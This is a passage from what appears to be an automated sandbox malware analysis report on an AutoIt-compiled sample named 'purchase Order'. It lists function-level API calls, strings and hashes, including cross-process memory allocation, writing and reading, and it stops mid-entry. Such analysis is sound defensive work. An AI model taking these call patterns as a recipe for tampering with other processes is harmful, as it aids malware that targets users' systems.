                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                        • String ID:
                                                        • API String ID: 146765662-0
                                                        • Opcode ID: 68c0612410fe453546146f29424da6b51bf8c71db0df216b2413346aabc30be6
                                                        • Instruction ID: 4e83eb0f9a69ad1bcf3438acc53bec47bd4f3f8592e546983a716764df71348d
                                                        • Opcode Fuzzy Hash: 68c0612410fe453546146f29424da6b51bf8c71db0df216b2413346aabc30be6
                                                        • Instruction Fuzzy Hash: 28E0267A104405BBDB016BA5EC08E5DFBB6FF993213148631F626815B5CB32A872EB91
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                        • String ID:
                                                        • API String ID: 2889604237-0
                                                        • Opcode ID: ac09a1c1b11595773ad8bb5d55fd53951e66f444eff61e1cf48734297547d8a6
                                                        • Instruction ID: 22a2699195d55136e179a097a3058a74b90485816e1c63ea4c103bdb5b98601f
                                                        • Opcode Fuzzy Hash: ac09a1c1b11595773ad8bb5d55fd53951e66f444eff61e1cf48734297547d8a6
                                                        • Instruction Fuzzy Hash: DFE046B5100204EFEB005F70C848B6E7BA8EB4C355F11C82AFC9BCB211CBB4A881DB44
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                        • String ID:
                                                        • API String ID: 2889604237-0
                                                        • Opcode ID: c6ad18d63858d15daeec9acff106cf7d0d202845262b159b51e6c20e189735d1
                                                        • Instruction ID: e52f6e4c63f882170f6f0116f342db49eb2d451e80138c3b550de8a3242b0ae5
                                                        • Opcode Fuzzy Hash: c6ad18d63858d15daeec9acff106cf7d0d202845262b159b51e6c20e189735d1
                                                        • Instruction Fuzzy Hash: 00E046B5500200EFDB005F70C848B6D7BA8EB4C355F118829FD9BCB211CB78A881DB04
                                                        APIs
                                                        • OleSetContainedObject.OLE32(?,00000001), ref: 00C7DEAA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: ContainedObject
                                                        • String ID: AutoIt3GUI$Container
                                                        • API String ID: 3565006973-3941886329
                                                        • Opcode ID: 5ea4b4d7ec39bfdf3190fb1e1d044088446a1226e68009ac08a27b6dd7d9abc0
                                                        • Instruction ID: 91450839daaced52eae1f09c549bc2fcad5aa1a3933546d779d7e5a0fa7a6369
                                                        • Opcode Fuzzy Hash: 5ea4b4d7ec39bfdf3190fb1e1d044088446a1226e68009ac08a27b6dd7d9abc0
                                                        • Instruction Fuzzy Hash: 15914774600601AFDB64CF64C884F6ABBF9BF48710F24846EF95ACB291DB71E941CB60
                                                        APIs
                                                        • Sleep.KERNEL32(00000000), ref: 00C5BCDA
                                                        • GlobalMemoryStatusEx.KERNEL32 ref: 00C5BCF3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: GlobalMemorySleepStatus
                                                        • String ID: @
                                                        • API String ID: 2783356886-2766056989
                                                        • Opcode ID: 107b1d9938507f8ca51f3c500433e57ab07b68a5524d01275bc4bac8d5819175
                                                        • Instruction ID: ca5759ea232bbef5d13761f0b2203566b2ad347310d7404010d089d9a04bdb4e
                                                        • Opcode Fuzzy Hash: 107b1d9938507f8ca51f3c500433e57ab07b68a5524d01275bc4bac8d5819175
                                                        • Instruction Fuzzy Hash: C75154714087449BE320AF14DC86BAFBBE8FF95355F41484EF5C8811A2DB7088ACD75A
                                                        APIs
                                                          • Part of subcall function 00C444ED: __fread_nolock.LIBCMT ref: 00C4450B
                                                        • _wcscmp.LIBCMT ref: 00C8C65D
                                                        • _wcscmp.LIBCMT ref: 00C8C670
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: _wcscmp$__fread_nolock
                                                        • String ID: FILE
                                                        • API String ID: 4029003684-3121273764
                                                        • Opcode ID: ac9ad0085d7d6aed8367d147374fc7d060dabb5705251696448106884f98c5e5
                                                        • Instruction ID: 013931cca14063288c397a3d1ed3937275654c7f97f09c464859d92b5a91e153
                                                        • Opcode Fuzzy Hash: ac9ad0085d7d6aed8367d147374fc7d060dabb5705251696448106884f98c5e5
                                                        • Instruction Fuzzy Hash: D541F372A0020ABBDF20AAA4CC82FEF77B9EF49714F104079F601EB181D6719A04DB65
                                                        APIs
                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00CAA85A
                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00CAA86F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: '
                                                        • API String ID: 3850602802-1997036262
                                                        • Opcode ID: 7916a7819c789dc7ba51fa531bd2e322821e0d8e308c0f2390f2ae6922124d27
                                                        • Instruction ID: e9cb05bd1b3c97ac39f4cbb2a50c8ae428ff9993f093e8029ad7175a229c3a20
                                                        • Opcode Fuzzy Hash: 7916a7819c789dc7ba51fa531bd2e322821e0d8e308c0f2390f2ae6922124d27
                                                        • Instruction Fuzzy Hash: E4410874E0130A9FDB54CF69C880BDA7BB9FB09304F10006AE919EB381D775A941CFA1
                                                        APIs
                                                        • _memset.LIBCMT ref: 00C95190
                                                        • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 00C951C6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: CrackInternet_memset
                                                        • String ID: |
                                                        • API String ID: 1413715105-2343686810
                                                        • Opcode ID: 65bd4fd3102296f6187d8fa72dca33829709cc5593af361283adc7553bca7cd7
                                                        • Instruction ID: 45c02f676302038b297958bdb4360f952aebc43f88540b1b59280ce1a1c2a7f8
                                                        • Opcode Fuzzy Hash: 65bd4fd3102296f6187d8fa72dca33829709cc5593af361283adc7553bca7cd7
                                                        • Instruction Fuzzy Hash: 28315771C01119AFCF51EFA4CC85AEEBFB9FF18700F100059F915A6166EB71AA06DBA0
                                                        APIs
                                                        • DestroyWindow.USER32(?,?,?,?), ref: 00CA980E
                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00CA984A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Window$DestroyMove
                                                        • String ID: static
                                                        • API String ID: 2139405536-2160076837
                                                        • Opcode ID: e86af8f043f529d149d038c4764aab80290606a2608697fa29123b9ee275a9f5
                                                        • Instruction ID: c3acc0769fa3f7902e611af6d927f294b5c81ced54ee578a4234f20668385466
                                                        • Opcode Fuzzy Hash: e86af8f043f529d149d038c4764aab80290606a2608697fa29123b9ee275a9f5
                                                        • Instruction Fuzzy Hash: FE31BC71100205AAEB109F78CC81BFB77B9FF5A768F108619F9AAC7190CA34AC81D760
                                                        APIs
                                                        • SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 00C7C2F7
                                                        • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00C7C331
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: @U=u
                                                        • API String ID: 3850602802-2594219639
                                                        • Opcode ID: ed9db9b23fcb70bbbf7d107ec162b5aba723cdee0fef5cb2188474d647a4b16f
                                                        • Instruction ID: 4f76f8d9e1e0e7a1665a9d2afed916f205337c09aeaf8bd49309b39ac1e962a8
                                                        • Opcode Fuzzy Hash: ed9db9b23fcb70bbbf7d107ec162b5aba723cdee0fef5cb2188474d647a4b16f
                                                        • Instruction Fuzzy Hash: 9F21B972D00216ABCB11AF54D8C1DFEB7B9FF88700B11C12DF919A72A0EA709D42D760
                                                        APIs
                                                        • _memset.LIBCMT ref: 00C851C6
                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00C85201
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: InfoItemMenu_memset
                                                        • String ID: 0
                                                        • API String ID: 2223754486-4108050209
                                                        • Opcode ID: c874879c02dbd5481024bbf13745158d0270b2f46e9d22ba3beb97e7db9264aa
                                                        • Instruction ID: 79a9b56e54142757c257dec998cc855879fac6e667a7687c8b9c67435cae2087
                                                        • Opcode Fuzzy Hash: c874879c02dbd5481024bbf13745158d0270b2f46e9d22ba3beb97e7db9264aa
                                                        • Instruction Fuzzy Hash: 7B312531600304ABEB24EF89C844B9EBBF4BF41358F14002DE9A1A61A0DBF09B44CB14
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: __snwprintf
                                                        • String ID: , $$AUTOITCALLVARIABLE%d
                                                        • API String ID: 2391506597-2584243854
                                                        • Opcode ID: 7b793bc3d410a2794a2775198e17b92f4f8cb707a942b5d2babeffe74994f9ef
                                                        • Instruction ID: 22528f8942489cd0c4827557e7c4b4be017f2346ceedaa6489f372e20b9f6bdc
                                                        • Opcode Fuzzy Hash: 7b793bc3d410a2794a2775198e17b92f4f8cb707a942b5d2babeffe74994f9ef
                                                        • Instruction Fuzzy Hash: 58216D71A00218BFCF14EFA4C886EEE77B4BF45740F004469F505AB296DB70EA45DBA6
                                                        APIs
                                                          • Part of subcall function 00C87DB1: GetLocalTime.KERNEL32 ref: 00C87DBE
                                                          • Part of subcall function 00C87DB1: _wcsncpy.LIBCMT ref: 00C87DF3
                                                          • Part of subcall function 00C87DB1: _wcsncpy.LIBCMT ref: 00C87E25
                                                          • Part of subcall function 00C87DB1: _wcsncpy.LIBCMT ref: 00C87E58
                                                          • Part of subcall function 00C87DB1: _wcsncpy.LIBCMT ref: 00C87E9A
                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00CA95F8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: _wcsncpy$LocalMessageSendTime
                                                        • String ID: @U=u$SysDateTimePick32
                                                        • API String ID: 2466184910-2530228043
                                                        • Opcode ID: 0c2a7f14c744008d99c9bb2ec20412956f083e447b05412b65e491df5ced6750
                                                        • Instruction ID: cef755264abd907f7c24fa4bd03a97313f42056a0f61f88c9eab9e4351d4c1b2
                                                        • Opcode Fuzzy Hash: 0c2a7f14c744008d99c9bb2ec20412956f083e447b05412b65e491df5ced6750
                                                        • Instruction Fuzzy Hash: 8321E1726402096FEF229E54CC83FEE336AEB45768F104A19F951AB2D0D6B1ED4197A0
                                                        APIs
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C7BBB0
                                                          • Part of subcall function 00C8422F: GetWindowThreadProcessId.USER32(?,?), ref: 00C8425A
                                                          • Part of subcall function 00C8422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00C7BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00C8426A
                                                          • Part of subcall function 00C8422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00C7BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00C84280
                                                          • Part of subcall function 00C8430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C7BC08,?,?,00000034,00000800,?,00000034), ref: 00C84335
                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00C7BC17
                                                          • Part of subcall function 00C842D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C7BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00C84300
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Process$MemoryMessageSend$AllocOpenReadThreadVirtualWindowWrite
                                                        • String ID: @U=u
                                                        • API String ID: 1045663743-2594219639
                                                        • Opcode ID: d537414f0eb2bd9480f2016844eeba33f4a58e33872ee5d7921dd161e61285f1
                                                        • Instruction ID: 53dffcc21ac7852115e1f1e1d6de968991f8faeea9f9be227bd1e5b262b04e99
                                                        • Opcode Fuzzy Hash: d537414f0eb2bd9480f2016844eeba33f4a58e33872ee5d7921dd161e61285f1
                                                        • Instruction Fuzzy Hash: 69216D31901129ABEF25ABA8DC81FDEBBB8FF04354F1041A5F559A7190EA705E44DBA0
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00CA945C
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00CA9467
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: Combobox
                                                        • API String ID: 3850602802-2096851135
                                                        • Opcode ID: 395fad7c8d7d26262bdf9d8b8c50460e3908ad6bef28ba5a5def16a3ba259243
                                                        • Instruction ID: e407afe958ee70094cd0b5909aa61ed751c69263f6a78af83fdc5340ea972ddc
                                                        • Opcode Fuzzy Hash: 395fad7c8d7d26262bdf9d8b8c50460e3908ad6bef28ba5a5def16a3ba259243
                                                        • Instruction Fuzzy Hash: CE11B27130020A6FEF21DE54DC81FBB376EEB893A8F100125F929972A0D6319D529B60
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @U=u
                                                        • API String ID: 0-2594219639
                                                        • Opcode ID: d2078aa7fcdf03abe285e878256b822f6f4174820e4e3a7fb4ae39de1e9c84b2
                                                        • Instruction ID: dea1cdab5dbb8ca32acf4defb551a055304eb9ed41da819b0a1216ceb73bc903
                                                        • Opcode Fuzzy Hash: d2078aa7fcdf03abe285e878256b822f6f4174820e4e3a7fb4ae39de1e9c84b2
                                                        • Instruction Fuzzy Hash: 8911E63510021AFFEF108FA4CCA5FB93764EB0E308F008115FA66DA1D0D270DA10EB68
                                                        APIs
                                                          • Part of subcall function 00C4103B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00C41052
                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00C7D54E
                                                        • _strlen.LIBCMT ref: 00C7D559
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Timeout_strlen
                                                        • String ID: @U=u
                                                        • API String ID: 2777139624-2594219639
                                                        • Opcode ID: ddef75ff7839a9ea6fbce61430ef95075ce10ce665bb02ee5a788224c60f1495
                                                        • Instruction ID: bbc8c39b4bca7a1ec8197436e3387e9f03e5288592e5c2c8994d3858ecab2c74
                                                        • Opcode Fuzzy Hash: ddef75ff7839a9ea6fbce61430ef95075ce10ce665bb02ee5a788224c60f1495
                                                        • Instruction Fuzzy Hash: 5211A371200105A7CB44AE69DCC29AE7BB8AF55344F008439FA0B9B192DE60DD86A7A0
                                                        APIs
                                                          • Part of subcall function 00C5D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C5D1BA
                                                          • Part of subcall function 00C5D17C: GetStockObject.GDI32(00000011), ref: 00C5D1CE
                                                          • Part of subcall function 00C5D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C5D1D8
                                                        • GetWindowRect.USER32(00000000,?), ref: 00CA9968
                                                        • GetSysColor.USER32(00000012), ref: 00CA9982
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                        • String ID: static
                                                        • API String ID: 1983116058-2160076837
                                                        • Opcode ID: 89c36fc8fda179bfa5dddbe935e32e4ae9f4c1020dbdcc8bae1b35a19c564887
                                                        • Instruction ID: dda447b849e32fd57ba532412c57b9874b9dc67937f6a132028cb3c08cb38963
                                                        • Opcode Fuzzy Hash: 89c36fc8fda179bfa5dddbe935e32e4ae9f4c1020dbdcc8bae1b35a19c564887
                                                        • Instruction Fuzzy Hash: 8F11297251020AAFDB14DFB8CC46EEE7BA8FB09358F054628F956D2250D735E851DB60
                                                        APIs
                                                        • _memset.LIBCMT ref: 00C852D5
                                                        • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00C852F4
                                                        Strings
                                                        Memory Dump Source
